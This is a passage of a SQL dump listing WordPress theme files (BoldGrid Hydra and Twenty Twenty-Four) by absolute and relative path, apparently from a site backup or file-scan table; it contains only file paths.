dgrid-hydra/inc/boldgrid-theme-framework/includes/scssphp/src/Block.php'),(14778,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/scssphp/src/Colors.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/scssphp/src/Colors.php'),(14779,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/scssphp/src/Compiler/Environment.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/scssphp/src/Compiler/Environment.php'),(14780,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/scssphp/src/Compiler.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/scssphp/src/Compiler.php'),(14781,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/scssphp/src/Exception/CompilerException.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/scssphp/src/Exception/CompilerException.php'),(14782,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/scssphp/src/Exception/ParserException.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/scssphp/src/Exception/ParserException.php'),(14783,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/scssphp/src/Exception/RangeException.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/scssphp/src/Exception/RangeException.php'),(14784,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/scssphp/src/Exception/ServerException.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/scssphp/src/Exception/ServerException.php'),(14785,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/scssphp/src/Formatter/Compact.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/scssphp/src/Formatter/Compact.php'),(14786,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/scssphp/src/Formatter/Compressed.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/scssphp/src/Formatter/Compressed.php'),(14787,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/scssphp/src/Formatter/Crunched.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/scssphp/src/Formatter/Crunched.php'),(14788,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/scssphp/src/Formatter/Debug.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/scssphp/src/Formatter/Debug.php'),(14789,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/scssphp/src/Formatter/Expanded.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/scssphp/src/Formatter/Expanded.php'),(14790,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/scssphp/src/Formatter/Nested.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/scssphp/src/Formatter/Nested.php'),(14791,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/scssphp/src/Formatter/OutputBlock.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/scssphp/src/Formatter/OutputBlock.php'),(14792,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/scssphp/src/Formatter.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/scssphp/src/Formatter.php'),(14793,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/scssphp/src/Node/Number.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/scssphp/src/Node/Number.php'),(14794,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/scssphp/src/Node.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/scssphp/src/Node.php'),(14795,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/scssphp/src/Parser.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/scssphp/src/Parser.php'),(14796,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/scssphp/src/SourceMap/Base64VLQEncoder.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/scssphp/src/SourceMap/Base64VLQEncoder.php'),(14797,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/scssphp/src/SourceMap/SourceMapGenerator.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/scssphp/src/SourceMap/SourceMapGenerator.php'),(14798,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/scssphp/src/Type.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/scssphp/src/Type.php'),(14799,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/scssphp/src/Util.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/scssphp/src/Util.php'),(14800,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/scssphp/src/Version.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/scssphp/src/Version.php'),(14801,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/tgm/class-tgm-plugin-activation.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/tgm/class-tgm-plugin-activation.php'),(14802,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/index.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/index.php'),(14803,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework-config/config.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework-config/config.php'),(14804,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/index.php','wp-content/themes/boldgrid-hydra/index.php'),(14805,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/page_home.php','wp-content/themes/boldgrid-hydra/page_home.php'),(14806,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/sa_templates/estimate.php','wp-content/themes/boldgrid-hydra/sa_templates/estimate.php'),(14807,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/sa_templates/invoice.php','wp-content/themes/boldgrid-hydra/sa_templates/invoice.php'),(14808,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/search.php','wp-content/themes/boldgrid-hydra/search.php'),(14809,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/searchform.php','wp-content/themes/boldgrid-hydra/searchform.php'),(14810,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/single.php','wp-content/themes/boldgrid-hydra/single.php'),(14811,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/templates/call-to-action.php','wp-content/themes/boldgrid-hydra/templates/call-to-action.php'),(14812,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/templates/comments.php','wp-content/themes/boldgrid-hydra/templates/comments.php'),(14813,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/templates/content-home.php','wp-content/themes/boldgrid-hydra/templates/content-home.php'),(14814,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/templates/content-none.php','wp-content/themes/boldgrid-hydra/templates/content-none.php'),(14815,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/templates/content-page.php','wp-content/themes/boldgrid-hydra/templates/content-page.php'),(14816,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/templates/content-search.php','wp-content/themes/boldgrid-hydra/templates/content-search.php'),(14817,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/templates/content-single.php','wp-content/themes/boldgrid-hydra/templates/content-single.php'),(14818,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/templates/content.php','wp-content/themes/boldgrid-hydra/templates/content.php'),(14819,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/templates/entry-footer.php','wp-content/themes/boldgrid-hydra/templates/entry-footer.php'),(14820,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/templates/entry-header-archive.php','wp-content/themes/boldgrid-hydra/templates/entry-header-archive.php'),(14821,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/templates/entry-header.php','wp-content/themes/boldgrid-hydra/templates/entry-header.php'),(14822,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/templates/footer/footer.php','wp-content/themes/boldgrid-hydra/templates/footer/footer.php'),(14823,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/templates/head.php','wp-content/themes/boldgrid-hydra/templates/head.php'),(14824,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/templates/header/header.php','wp-content/themes/boldgrid-hydra/templates/header/header.php'),(14825,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/templates/header/search.php','wp-content/themes/boldgrid-hydra/templates/header/search.php'),(14826,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/templates/recent-entries.php','wp-content/themes/boldgrid-hydra/templates/recent-entries.php'),(14827,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/templates/sidebar.php','wp-content/themes/boldgrid-hydra/templates/sidebar.php'),(14828,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/woocommerce/archive-product.php','wp-content/themes/boldgrid-hydra/woocommerce/archive-product.php'),(14829,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/woocommerce/cart/cart-empty.php','wp-content/themes/boldgrid-hydra/woocommerce/cart/cart-empty.php'),(14830,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/woocommerce/cart/cart.php','wp-content/themes/boldgrid-hydra/woocommerce/cart/cart.php'),(14831,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/woocommerce/cart/proceed-to-checkout-button.php','wp-content/themes/boldgrid-hydra/woocommerce/cart/proceed-to-checkout-button.php'),(14832,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/woocommerce/checkout/cart-errors.php','wp-content/themes/boldgrid-hydra/woocommerce/checkout/cart-errors.php'),(14833,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/woocommerce/checkout/form-coupon.php','wp-content/themes/boldgrid-hydra/woocommerce/checkout/form-coupon.php'),(14834,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/woocommerce/checkout/payment-method.php','wp-content/themes/boldgrid-hydra/woocommerce/checkout/payment-method.php'),(14835,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/woocommerce/checkout/payment.php','wp-content/themes/boldgrid-hydra/woocommerce/checkout/payment.php'),(14836,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/woocommerce/global/breadcrumb.php','wp-content/themes/boldgrid-hydra/woocommerce/global/breadcrumb.php'),(14837,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/woocommerce/global/form-login.php','wp-content/themes/boldgrid-hydra/woocommerce/global/form-login.php'),(14838,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/woocommerce/global/quantity-input.php','wp-content/themes/boldgrid-hydra/woocommerce/global/quantity-input.php'),(14839,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/woocommerce/loop/no-products-found.php','wp-content/themes/boldgrid-hydra/woocommerce/loop/no-products-found.php'),(14840,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/woocommerce/loop/pagination.php','wp-content/themes/boldgrid-hydra/woocommerce/loop/pagination.php'),(14841,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/woocommerce/loop/price.php','wp-content/themes/boldgrid-hydra/woocommerce/loop/price.php'),(14842,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/woocommerce/myaccount/downloads.php','wp-content/themes/boldgrid-hydra/woocommerce/myaccount/downloads.php'),(14843,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/woocommerce/myaccount/form-edit-account.php','wp-content/themes/boldgrid-hydra/woocommerce/myaccount/form-edit-account.php'),(14844,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/woocommerce/myaccount/form-login.php','wp-content/themes/boldgrid-hydra/woocommerce/myaccount/form-login.php'),(14845,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/woocommerce/myaccount/form-lost-password.php','wp-content/themes/boldgrid-hydra/woocommerce/myaccount/form-lost-password.php'),(14846,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/woocommerce/myaccount/form-reset-password.php','wp-content/themes/boldgrid-hydra/woocommerce/myaccount/form-reset-password.php'),(14847,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/woocommerce/myaccount/my-orders.php','wp-content/themes/boldgrid-hydra/woocommerce/myaccount/my-orders.php'),(14848,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/woocommerce/myaccount/navigation.php','wp-content/themes/boldgrid-hydra/woocommerce/myaccount/navigation.php'),(14849,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/woocommerce/myaccount/orders.php','wp-content/themes/boldgrid-hydra/woocommerce/myaccount/orders.php'),(14850,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/woocommerce/product-searchform.php','wp-content/themes/boldgrid-hydra/woocommerce/product-searchform.php'),(14851,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/woocommerce/single-product/add-to-cart/external.php','wp-content/themes/boldgrid-hydra/woocommerce/single-product/add-to-cart/external.php'),(14852,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/woocommerce/single-product/add-to-cart/grouped.php','wp-content/themes/boldgrid-hydra/woocommerce/single-product/add-to-cart/grouped.php'),(14853,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/woocommerce/single-product/add-to-cart/simple.php','wp-content/themes/boldgrid-hydra/woocommerce/single-product/add-to-cart/simple.php'),(14854,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/woocommerce/single-product/add-to-cart/variation-add-to-cart-button.php','wp-content/themes/boldgrid-hydra/woocommerce/single-product/add-to-cart/variation-add-to-cart-button.php'),(14855,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/woocommerce/single-product/price.php','wp-content/themes/boldgrid-hydra/woocommerce/single-product/price.php'),(14856,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/woocommerce/single-product.php','wp-content/themes/boldgrid-hydra/woocommerce/single-product.php'),(14857,'/home/eckank5/public_html/wp-content/themes/index.php','wp-content/themes/index.php'),(14858,'/home/eckank5/public_html/wp-content/themes/twentytwentyfour/assets/css/button-outline.css','wp-content/themes/twentytwentyfour/assets/css/button-outline.css'),(14859,'/home/eckank5/public_html/wp-content/themes/twentytwentyfour/assets/fonts/cardo/LICENSE.txt','wp-content/themes/twentytwentyfour/assets/fonts/cardo/LICENSE.txt'),(14860,'/home/eckank5/public_html/wp-content/themes/twentytwentyfour/assets/fonts/cardo/cardo_italic_400.woff2','wp-content/themes/twentytwentyfour/assets/fonts/cardo/cardo_italic_400.woff2'),(14861,'/home/eckank5/public_html/wp-content/themes/twentytwentyfour/assets/fonts/cardo/cardo_normal_400.woff2','wp-content/themes/twentytwentyfour/assets/fonts/cardo/cardo_normal_400.woff2'),(14862,'/home/eckank5/public_html/wp-content/themes/twentytwentyfour/assets/fonts/cardo/cardo_normal_700.woff2','wp-content/themes/twentytwentyfour/assets/fonts/cardo/cardo_normal_700.woff2'),(14863,'/home/eckank5/public_html/wp-content/themes/twentytwentyfour/assets/fonts/instrument-sans/InstrumentSans-Italic-VariableFont_wdth,wght.woff2','wp-content/themes/twentytwentyfour/assets/fonts/instrument-sans/InstrumentSans-Italic-VariableFont_wdth,wght.woff2'),(14864,'/home/eckank5/public_html/wp-content/themes/twentytwentyfour/assets/fonts/instrument-sans/InstrumentSans-VariableFont_wdth,wght.woff2','wp-content/themes/twentytwentyfour/assets/fonts/instrument-sans/InstrumentSans-VariableFont_wdth,wght.woff2'),(14865,'/home/eckank5/public_html/wp-content/themes/twentytwentyfour/assets/fonts/instrument-sans/OFL.txt','wp-content/themes/twentytwentyfour/assets/fonts/instrument-sans/OFL.txt'),(14866,'/home/eckank5/public_html/wp-content/themes/twentytwentyfour/assets/fonts/inter/Inter-VariableFont_slnt,wght.woff2','wp-content/themes/twentytwentyfour/assets/fonts/inter/Inter-VariableFont_slnt,wght.woff2'),(14867,'/home/eckank5/public_html/wp-content/themes/twentytwentyfour/assets/fonts/inter/LICENSE.txt','wp-content/themes/twentytwentyfour/assets/fonts/inter/LICENSE.txt'),(14868,'/home/eckank5/public_html/wp-content/themes/twentytwentyfour/assets/fonts/jost/Jost-Italic-VariableFont_wght.woff2','wp-content/themes/twentytwentyfour/assets/fonts/jost/Jost-Italic-VariableFont_wght.woff2'),(14869,'/home/eckank5/public_html/wp-content/themes/twentytwentyfour/assets/fonts/jost/Jost-VariableFont_wght.woff2','wp-content/themes/twentytwentyfour/assets/fonts/jost/Jost-VariableFont_wght.woff2'),(14870,'/home/eckank5/public_html/wp-content/themes/twentytwentyfour/assets/fonts/jost/OFL.txt','wp-content/themes/twentytwentyfour/assets/fonts/jost/OFL.txt'),(14871,'/home/eckank5/public_html/wp-content/themes/twentytwentyfour/assets/images/abstract-geometric-art.webp','wp-content/themes/twentytwentyfour/assets/images/abstract-geometric-art.webp'),(14872,'/home/eckank5/public_html/wp-content/themes/twentytwentyfour/assets/images/angular-roof.webp','wp-content/themes/twentytwentyfour/assets/images/angular-roof.webp'),(14873,'/home/eckank5/public_html/wp-content/themes/twentytwentyfour/assets/images/art-gallery.webp','wp-content/themes/twentytwentyfour/assets/images/art-gallery.webp'),(14874,'/home/eckank5/public_html/wp-content/themes/twentytwentyfour/assets/images/building-exterior.webp','wp-content/themes/twentytwentyfour/assets/images/building-exterior.webp'),(14875,'/home/eckank5/public_html/wp-content/themes/twentytwentyfour/assets/images/green-staircase.webp','wp-content/themes/twentytwentyfour/assets/images/green-staircase.webp'),(14876,'/home/eckank5/public_html/wp-content/themes/twentytwentyfour/assets/images/hotel-facade.webp','wp-content/themes/twentytwentyfour/assets/images/hotel-facade.webp'),(14877,'/home/eckank5/public_html/wp-content/themes/twentytwentyfour/assets/images/icon-message.webp','wp-content/themes/twentytwentyfour/assets/images/icon-message.webp'),(14878,'/home/eckank5/public_html/wp-content/themes/twentytwentyfour/assets/images/museum.webp','wp-content/themes/twentytwentyfour/assets/images/museum.webp'),(14879,'/home/eckank5/public_html/wp-content/themes/twentytwentyfour/assets/images/tourist-and-building.webp','wp-content/themes/twentytwentyfour/assets/images/tourist-and-building.webp'),(14880,'/home/eckank5/public_html/wp-content/themes/twentytwentyfour/assets/images/windows.webp','wp-content/themes/twentytwentyfour/assets/images/windows.webp'),(14881,'/home/eckank5/public_html/wp-content/themes/twentytwentyfour/functions.php','wp-content/themes/twentytwentyfour/functions.php'),(14882,'/home/eckank5/public_html/wp-content/themes/twentytwentyfour/parts/footer.html','wp-content/themes/twentytwentyfour/parts/footer.html'),(14883,'/home/eckank5/public_html/wp-content/themes/twentytwentyfour/parts/header.html','wp-content/themes/twentytwentyfour/parts/header.html'),(14884,'/home/eckank5/public_html/wp-content/themes/twentytwentyfour/parts/post-meta.html','wp-content/themes/twentytwentyfour/parts/post-meta.html'),(14885,'/home/eckank5/public_html/wp-content/themes/twentytwentyfour/parts/sidebar.html','wp-content/themes/twentytwentyfour/parts/sidebar.html'),(14886,'/home/eckank5/public_html/wp-content/themes/twentytwentyfour/patterns/banner-hero.php','wp-content/themes/twentytwentyfour/patterns/banner-hero.php'),(14887,'/home/eckank5/public_html/wp-content/themes/twentytwentyfour/patterns/banner-project-description.php','wp-content/themes/twentytwentyfour/patterns/banner-project-description.php'),(14888,'/home/eckank5/public_html/wp-content/themes/twentytwentyfour/patterns/cta-content-image-on-right.php','wp-content/themes/twentytwentyfour/patterns/cta-content-image-on-right.php'),(14889,'/home/eckank5/public_html/wp-content/themes/twentytwentyfour/patterns/cta-pricing.php','wp-content/themes/twentytwentyfour/patterns/cta-pricing.php'),(14890,'/home/eckank5/public_html/wp-content/themes/twentytwentyfour/patterns/cta-rsvp.php','wp-content/themes/twentytwentyfour/patterns/cta-rsvp.php'),(14891,'/home/eckank5/public_html/wp-content/themes/twentytwentyfour/patterns/cta-services-image-left.php','wp-content/themes/twentytwentyfour/patterns/cta-services-image-left.php'),(14892,'/home/eckank5/public_html/wp-content/themes/twentytwentyfour/patterns/cta-subscribe-centered.php','wp-content/themes/twentytwentyfour/patterns/cta-subscribe-centered.php'),(14893,'/home/eckank5/public_html/wp-content/themes/twentytwentyfour/patterns/footer-centered-logo-nav.php','wp-content/themes/twentytwentyfour/patterns/footer-centered-logo-nav.php'),(14894,'/home/eckank5/public_html/wp-content/themes/twentytwentyfour/patterns/footer-colophon-3-col.php','wp-content/themes/twentytwentyfour/patterns/footer-colophon-3-col.php'),(14895,'/home/eckank5/public_html/wp-content/themes/twentytwentyfour/patterns/footer.php','wp-content/themes/twentytwentyfour/patterns/footer.php'),(14896,'/home/eckank5/public_html/wp-content/themes/twentytwentyfour/patterns/gallery-full-screen-image.php','wp-content/themes/twentytwentyfour/patterns/gallery-full-screen-image.php'),(14897,'/home/eckank5/public_html/wp-content/themes/twentytwentyfour/patterns/gallery-offset-images-grid-2-col.php','wp-content/themes/twentytwentyfour/patterns/gallery-offset-images-grid-2-col.php'),(14898,'/home/eckank5/public_html/wp-content/themes/twentytwentyfour/patterns/gallery-offset-images-grid-3-col.php','wp-content/themes/twentytwentyfour/patterns/gallery-offset-images-grid-3-col.php'),(14899,'/home/eckank5/public_html/wp-content/themes/twentytwentyfour/patterns/gallery-offset-images-grid-4-col.php','wp-content/themes/twentytwentyfour/patterns/gallery-offset-images-grid-4-col.php'),(14900,'/home/eckank5/public_html/wp-content/themes/twentytwentyfour/patterns/gallery-project-layout.php','wp-content/themes/twentytwentyfour/patterns/gallery-project-layout.php'),(14901,'/home/eckank5/public_html/wp-content/themes/twentytwentyfour/patterns/hidden-404.php','wp-content/themes/twentytwentyfour/patterns/hidden-404.php'),(14902,'/home/eckank5/public_html/wp-content/themes/twentytwentyfour/patterns/hidden-comments.php','wp-content/themes/twentytwentyfour/patterns/hidden-comments.php'),(14903,'/home/eckank5/public_html/wp-content/themes/twentytwentyfour/patterns/hidden-no-results.php','wp-content/themes/twentytwentyfour/patterns/hidden-no-results.php'),(14904,'/home/eckank5/public_html/wp-content/themes/twentytwentyfour/patterns/hidden-portfolio-hero.php','wp-content/themes/twentytwentyfour/patterns/hidden-portfolio-hero.php'),(14905,'/home/eckank5/public_html/wp-content/themes/twentytwentyfour/patterns/hidden-post-meta.php','wp-content/themes/twentytwentyfour/patterns/hidden-post-meta.php'),(14906,'/home/eckank5/public_html/wp-content/themes/twentytwentyfour/patterns/hidden-post-navigation.php','wp-content/themes/twentytwentyfour/patterns/hidden-post-navigation.php'),(14907,'/home/eckank5/public_html/wp-content/themes/twentytwentyfour/patterns/hidden-search.php','wp-content/themes/twentytwentyfour/patterns/hidden-search.php'),(14908,'/home/eckank5/public_html/wp-content/themes/twentytwentyfour/patterns/hidden-sidebar.php','wp-content/themes/twentytwentyfour/patterns/hidden-sidebar.php'),(14909,'/home/eckank5/public_html/wp-content/themes/twentytwentyfour/patterns/page-about-business.php','wp-content/themes/twentytwentyfour/patterns/page-about-business.php'),(14910,'/home/eckank5/public_html/wp-content/themes/twentytwentyfour/patterns/page-home-blogging.php','wp-content/themes/twentytwentyfour/patterns/page-home-blogging.php'),(14911,'/home/eckank5/public_html/wp-content/themes/twentytwentyfour/patterns/page-home-business.php','wp-content/themes/twentytwentyfour/patterns/page-home-business.php'),(14912,'/home/eckank5/public_html/wp-content/themes/twentytwentyfour/patterns/page-home-portfolio-gallery.php','wp-content/themes/twentytwentyfour/patterns/page-home-portfolio-gallery.php'),(14913,'/home/eckank5/public_html/wp-content/themes/twentytwentyfour/patterns/page-home-portfolio.php','wp-content/themes/twentytwentyfour/patterns/page-home-portfolio.php'),(14914,'/home/eckank5/public_html/wp-content/themes/twentytwentyfour/patterns/page-newsletter-landing.php','wp-content/themes/twentytwentyfour/patterns/page-newsletter-landing.php'),(14915,'/home/eckank5/public_html/wp-content/themes/twentytwentyfour/patterns/page-portfolio-overview.php','wp-content/themes/twentytwentyfour/patterns/page-portfolio-overview.php'),(14916,'/home/eckank5/public_html/wp-content/themes/twentytwentyfour/patterns/page-rsvp-landing.php','wp-content/themes/twentytwentyfour/patterns/page-rsvp-landing.php'),(14917,'/home/eckank5/public_html/wp-content/themes/twentytwentyfour/patterns/posts-1-col.php','wp-content/themes/twentytwentyfour/patterns/posts-1-col.php'),(14918,'/home/eckank5/public_html/wp-content/themes/twentytwentyfour/patterns/posts-3-col.php','wp-content/themes/twentytwentyfour/patterns/posts-3-col.php'),(14919,'/home/eckank5/public_html/wp-content/themes/twentytwentyfour/patterns/posts-grid-2-col.php','wp-content/themes/twentytwentyfour/patterns/posts-grid-2-col.php'),(14920,'/home/eckank5/public_html/wp-content/themes/twentytwentyfour/patterns/posts-images-only-3-col.php','wp-content/themes/twentytwentyfour/patterns/posts-images-only-3-col.php'),(14921,'/home/eckank5/public_html/wp-content/themes/twentytwentyfour/patterns/posts-images-only-offset-4-col.php','wp-content/themes/twentytwentyfour/patterns/posts-images-only-offset-4-col.php'),(14922,'/home/eckank5/public_html/wp-content/themes/twentytwentyfour/patterns/posts-list.php','wp-content/themes/twentytwentyfour/patterns/posts-list.php'),(14923,'/home/eckank5/public_html/wp-content/themes/twentytwentyfour/patterns/team-4-col.php','wp-content/themes/twentytwentyfour/patterns/team-4-col.php'),(14924,'/home/eckank5/public_html/wp-content/themes/twentytwentyfour/patterns/template-archive-blogging.php','wp-content/themes/twentytwentyfour/patterns/template-archive-blogging.php'),(14925,'/home/eckank5/public_html/wp-content/themes/twentytwentyfour/patterns/template-archive-portfolio.php','wp-content/themes/twentytwentyfour/patterns/template-archive-portfolio.php'),(14926,'/home/eckank5/public_html/wp-content/themes/twentytwentyfour/patterns/template-home-blogging.php','wp-content/themes/twentytwentyfour/patterns/template-home-blogging.php'),(14927,'/home/eckank5/public_html/wp-content/themes/twentytwentyfour/patterns/template-home-business.php','wp-content/themes/twentytwentyfour/patterns/template-home-business.php'),(14928,'/home/eckank5/public_html/wp-content/themes/twentytwentyfour/patterns/template-home-portfolio.php','wp-content/themes/twentytwentyfour/patterns/template-home-portfolio.php'),(14929,'/home/eckank5/public_html/wp-content/themes/twentytwentyfour/patterns/template-index-blogging.php','wp-content/themes/twentytwentyfour/patterns/template-index-blogging.php'),(14930,'/home/eckank5/public_html/wp-content/themes/twentytwentyfour/patterns/template-index-portfolio.php','wp-content/themes/twentytwentyfour/patterns/template-index-portfolio.php'),(14931,'/home/eckank5/public_html/wp-content/themes/twentytwentyfour/patterns/template-search-blogging.php','wp-content/themes/twentytwentyfour/patterns/template-search-blogging.php'),(14932,'/home/eckank5/public_html/wp-content/themes/twentytwentyfour/patterns/template-search-portfolio.php','wp-content/themes/twentytwentyfour/patterns/template-search-portfolio.php'),(14933,'/home/eckank5/public_html/wp-content/themes/twentytwentyfour/patterns/template-single-portfolio.php','wp-content/themes/twentytwentyfour/patterns/template-single-portfolio.php'),(14934,'/home/eckank5/public_html/wp-content/themes/twentytwentyfour/patterns/testimonial-centered.php','wp-content/themes/twentytwentyfour/patterns/testimonial-centered.php'),(14935,'/home/eckank5/public_html/wp-content/themes/twentytwentyfour/patterns/text-alternating-images.php','wp-content/themes/twentytwentyfour/patterns/text-alternating-images.php'),(14936,'/home/eckank5/public_html/wp-content/themes/twentytwentyfour/patterns/text-centered-statement-small.php','wp-content/themes/twentytwentyfour/patterns/text-centered-statement-small.php'),(14937,'/home/eckank5/public_html/wp-content/themes/twentytwentyfour/patterns/text-centered-statement.php','wp-content/themes/twentytwentyfour/patterns/text-centered-statement.php'),(14938,'/home/eckank5/public_html/wp-content/themes/twentytwentyfour/patterns/text-faq.php','wp-content/themes/twentytwentyfour/patterns/text-faq.php'),(14939,'/home/eckank5/public_html/wp-content/themes/twentytwentyfour/patterns/text-feature-grid-3-col.php','wp-content/themes/twentytwentyfour/patterns/text-feature-grid-3-col.php'),(14940,'/home/eckank5/public_html/wp-content/themes/twentytwentyfour/patterns/text-project-details.php','wp-content/themes/twentytwentyfour/patterns/text-project-details.php'),(14941,'/home/eckank5/public_html/wp-content/themes/twentytwentyfour/patterns/text-title-left-image-right.php','wp-content/themes/twentytwentyfour/patterns/text-title-left-image-right.php'),(14942,'/home/eckank5/public_html/wp-content/themes/twentytwentyfour/readme.txt','wp-content/themes/twentytwentyfour/readme.txt'),(14943,'/home/eckank5/public_html/wp-content/themes/twentytwentyfour/screenshot.png','wp-content/themes/twentytwentyfour/screenshot.png'),(14944,'/home/eckank5/public_html/wp-content/themes/twentytwentyfour/style.css','wp-content/themes/twentytwentyfour/style.css'),(14945,'/home/eckank5/public_html/wp-content/themes/twentytwentyfour/styles/ember.json','wp-content/themes/twentytwentyfour/styles/ember.json'),(14946,'/home/eckank5/public_html/wp-content/themes/twentytwentyfour/styles/fossil.json','wp-content/themes/twentytwentyfour/styles/fossil.json'),(14947,'/home/eckank5/public_html/wp-content/themes/twentytwentyfour/styles/ice.json','wp-content/themes/